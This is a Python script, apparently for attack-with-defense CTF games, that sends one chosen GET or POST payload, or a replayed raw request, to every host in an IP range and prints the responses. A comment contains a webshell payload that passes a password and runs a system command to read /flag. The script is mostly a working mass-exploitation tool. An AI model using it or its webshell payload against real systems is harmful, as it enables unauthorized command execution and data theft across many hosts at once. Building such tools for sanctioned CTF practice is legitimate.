批量get_flag v3

#!/usr/bin/env python
# encoding: utf-8
from IPy import IP
import requests
import sys


# 批量Get_Flag

# IP地址處理,調用方法IPs("192.168.10.0/24")或IPs("192.168.10.0-20"),返回一個數組
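def IPs(ip):
    """Expand a range specification into a list of dotted-address strings.

    Accepted forms:
      * "192.168.10.0/24" (a '/' anywhere after the first character) is
        expanded with IPy's IP(); every address it iterates is returned.
      * "192.168.10.0-20": the text between the last '.' and the last '-' is
        the first host number, the text after the '-' the last one; both ends
        are included and the prefix up to (and including) the last '.' is
        reused for every address.
      * Any other non-blank text is returned unchanged as a one-element list
        (the old version silently returned [] for a single address).
      * Blank input yields [].

    Every element is a str. The CIDR branch used to collect IPy.IP objects,
    which made ``'[*]testing ' + i`` in the callers raise TypeError.

    Args:
        ip: range text; non-str values are converted with str() first.

    Returns:
        list[str] of addresses in expansion order.

    Raises:
        ValueError: when the '-' bounds are not integers or IPy rejects the
            network text (unchanged from the old version).
    """
    spec = str(ip).strip()
    if not spec:
        return []
    if spec.find('/') > 0:
        return [str(addr) for addr in IP(spec)]
    if spec.find('-') > 0:
        head = spec[:spec.rfind('.') + 1]  # prefix including the final '.'
        dash = spec.rfind('-')
        first = int(spec[len(head):dash])
        last = int(spec[dash + 1:])
        return [head + str(n) for n in range(first, last + 1)]
    return [spec]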


# Fixed header set attached to every request the helpers below send.
# The values are reproduced exactly as the original literal had them
# (including the trailing space at the end of the User-Agent string).
headers = dict([
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
    ('Referer', 'https://www.baidu.com'),
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 '),
    ('Cache-Control', 'no-cache'),
])


# get請求
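def get_Requests(ip, payload):
    """Send one GET to http://<ip>/<payload> and return the response body.

    Args:
        ip: target host; converted with str() so IPy.IP objects work too.
        payload: path (and query) appended after "http://<ip>/".

    Returns:
        The response text, or a short status string when the request did not
        complete: "Connect Timeout" on a connect timeout (message unchanged),
        otherwise "Request Failed: <ExceptionName>". The old version only
        caught ConnectTimeout, so a refused connection, read timeout or DNS
        error propagated and aborted the whole batch loop.
    """
    url = 'http://' + str(ip) + '/' + payload
    try:
        response = requests.get(url, headers=headers, timeout=3)
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"
    except requests.exceptions.RequestException as exc:
        return "Request Failed: " + type(exc).__name__
    return response.text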

# post請求
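def post_Requests(ip, payload, post_data):
    """Send one POST to http://<ip>/<payload> with a form body; return the text.

    Args:
        ip: target host; converted with str() for consistency with
            get_Requests (IPs() may yield non-str objects).
        payload: path appended after "http://<ip>/".
        post_data: form body as "k1=v1&k2=v2" text. Each '&'-separated field
            is split on its FIRST '=' only, so values that themselves contain
            '=' stay intact; a field without '=' gets an empty-string value
            and empty fields are skipped (the old code raised IndexError in
            both cases).

    Returns:
        The response text, "Connect Timeout" on a connect timeout, or
        "Request Failed: <ExceptionName>" for any other requests error
        (previously those propagated and aborted the batch loop).
    """
    url = 'http://' + str(ip) + '/' + payload
    form = {}
    for field in str(post_data).split('&'):
        if not field:
            continue
        key, _, value = field.partition('=')
        form[key] = value
    print(form)  # echo the parsed body, as the old version did
    try:
        response = requests.post(url,
                                 headers=headers,
                                 data=form,
                                 timeout=3)
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"
    except requests.exceptions.RequestException as exc:
        return "Request Failed: " + type(exc).__name__
    return response.text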


# 讀取文件
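def open_file(file_name):
    """Read a text file and return its lines without the trailing newline.

    The file is opened in a ``with`` block so the handle is closed as soon as
    reading finishes (the old version left the open file to the garbage
    collector).

    Args:
        file_name: path of the file to read.

    Returns:
        list[str], one entry per line in file order, each with its '\\n'
        removed.

    Raises:
        OSError: if the file cannot be opened (propagated from open()).
    """
    with open(file_name) as handle:
        return [line.rstrip('\n') for line in handle]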


# 解析get數據包
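def get_Data(data):
    """Return the request target from the first line of a raw GET request.

    ``data`` is the list of lines produced by open_file(); its first line is
    a request line such as "GET /test.php?x=1 HTTP/1.1". The second
    whitespace-separated token is returned with one leading '/' removed, so
    get_Requests builds "http://<ip>/test.php?x=1" instead of the
    "http://<ip>//test.php?x=1" the old version produced for every file.

    Args:
        data: list of str lines; only data[0] is inspected.

    Returns:
        str request target without its leading '/'.

    Raises:
        ValueError: if data is empty or the first line has no target token
            (the old code raised a bare IndexError).
    """
    if not data:
        raise ValueError("request file is empty")
    tokens = data[0].split()
    if len(tokens) < 2:
        raise ValueError("malformed request line: " + repr(data[0]))
    target = tokens[1]
    return target[1:] if target.startswith('/') else target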


# pass=365Eval@Awd&cmd=system('cat /flag')
# 解析post數據包
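def post_Data(data):
    """Split a raw POST request (list of lines) into ``[target, body]``.

    The first line is the request line ("POST /login.php HTTP/1.1"); its
    second token is the target, returned with one leading '/' removed so
    post_Requests builds a single-slash URL. The body is the LAST line of
    the file, exactly as before: headers, the blank separator line and any
    earlier body lines are ignored.

    Args:
        data: list of str lines from open_file().

    Returns:
        A two-element list [target, post_data]; the list form is kept so the
        callers' [0]/[1] indexing keeps working.

    Raises:
        ValueError: if data is empty or the request line has no target token
            (the old code raised a bare IndexError).
    """
    if not data:
        raise ValueError("request file is empty")
    tokens = data[0].split()
    if len(tokens) < 2:
        raise ValueError("malformed request line: " + repr(data[0]))
    target = tokens[1]
    if target.startswith('/'):
        target = target[1:]
    return [target, data[-1]]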


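def _probe_all(ip_range, send):
    """Call ``send(host)`` for every host in ``ip_range`` and print the result.

    ``host`` is passed as a str even if IPs() yields other objects, so the
    '[*]testing ' line and the URL builders never hit a TypeError.
    """
    for host in IPs(ip_range):
        host = str(host)
        print('[*]testing ' + host)
        print(send(host))


def _probe_from_file(ip_range, filename):
    """Replay the request described in ``filename`` against every host.

    The first token of the first line selects GET or POST handling; anything
    else (including an empty file, which used to raise IndexError) prints
    'error'. The request is parsed once instead of once per host.
    """
    data = open_file(filename)
    tokens = data[0].split() if data else []
    method = tokens[0].upper() if tokens else ''
    if method == 'GET':
        target = get_Data(data)
        _probe_all(ip_range, lambda host: get_Requests(host, target))
    elif method == 'POST':
        target, body = post_Data(data)
        _probe_all(ip_range, lambda host: post_Requests(host, target, body))
    else:
        print('error')


def _parse_args(argv):
    """Collect ``--name=value`` options from ``argv`` (argv[0] is skipped).

    Returns a dict with the keys type, payload, data, file and ip, each ''
    when not given. Values are split on the FIRST '=' only, so
    ``--data=username=sss&passwd=ddd`` keeps the whole body (the old code
    kept only 'username'); an argument without '=' is ignored instead of
    raising IndexError.
    """
    opts = {'type': '', 'payload': '', 'data': '', 'file': '', 'ip': ''}
    for arg in argv[1:]:
        name, sep, value = arg.partition('=')
        if sep and name.startswith('--') and name[2:] in opts:
            opts[name[2:]] = value
    return opts


def cmd():
    """Command-line entry point.

    Without arguments, prints the usage lines and falls back to the
    interactive main(). Otherwise reads --type/--ip/--payload/--data/--file
    and runs one of three modes:

      * --type=get  --ip=... --payload=...            GET probe
      * --type=post --ip=... --payload=... --data=...  POST probe
      * --file=...  --ip=...                          replay a request file

    Fixes relative to the old version:
      * the usage text said ``--pyload`` while the parser only accepted
        ``--payload``; the text now matches the parser;
      * --type=post passed the raw --data string through post_Data(), which
        indexed it as a list of lines and raised IndexError; it now calls
        post_Requests(host, payload, data) the way main() does;
      * --file mode was unreachable without --type, because the file branch
        sat inside the ``if request_type`` block; it now runs whenever --type
        is not get/post and --file is given, and anything else prints 'error'
        instead of silently doing nothing.
    """
    if len(sys.argv) == 1:
        print("Instructions for use")
        print("python3 Game.py --type=get --ip=192.168.10.0/24 --payload=test.php")
        print("python3 Game.py --type=post --ip=192.168.10.0/24 --payload=test.php --data=username=sss&passwd=ddd")
        print("python3 Game.py --file=post.txt --ip=192.168.10.0/24 ")
        main()
        return
    opts = _parse_args(sys.argv)
    mode = opts['type'].upper()
    if mode == 'GET':
        payload = opts['payload']
        _probe_all(opts['ip'], lambda host: get_Requests(host, payload))
    elif mode == 'POST':
        payload, body = opts['payload'], opts['data']
        _probe_all(opts['ip'], lambda host: post_Requests(host, payload, body))
    elif opts['file']:
        _probe_from_file(opts['ip'], opts['file'])
    else:
        print('error')


def main():
    """Interactive entry point: prompt for the range and mode, then probe.

    Choice 3 replays a request file (same handling as ``cmd --file``),
    2 sends POSTs, and any other integer sends GETs, as before. A
    non-numeric choice prints 'error' instead of letting int() raise.
    """
    print('#get_Flag V2.0')
    ip_range = input('Please enter the IP range >>>')

    try:
        choice = int(input('Please select request method 1 = get 2 = post 3 = auto>>>'))
    except ValueError:
        print('error')
        return
    if choice == 3:
        _probe_from_file(ip_range, input('Please enter filename>>>'))
        return
    payload = input('Please enter the payload>>>')
    if choice == 2:
        body = input('Please enter post_data>>>')
        _probe_all(ip_range, lambda host: post_Requests(host, payload, body))
    else:
        _probe_all(ip_range, lambda host: get_Requests(host, payload))


if __name__ == '__main__':
    cmd()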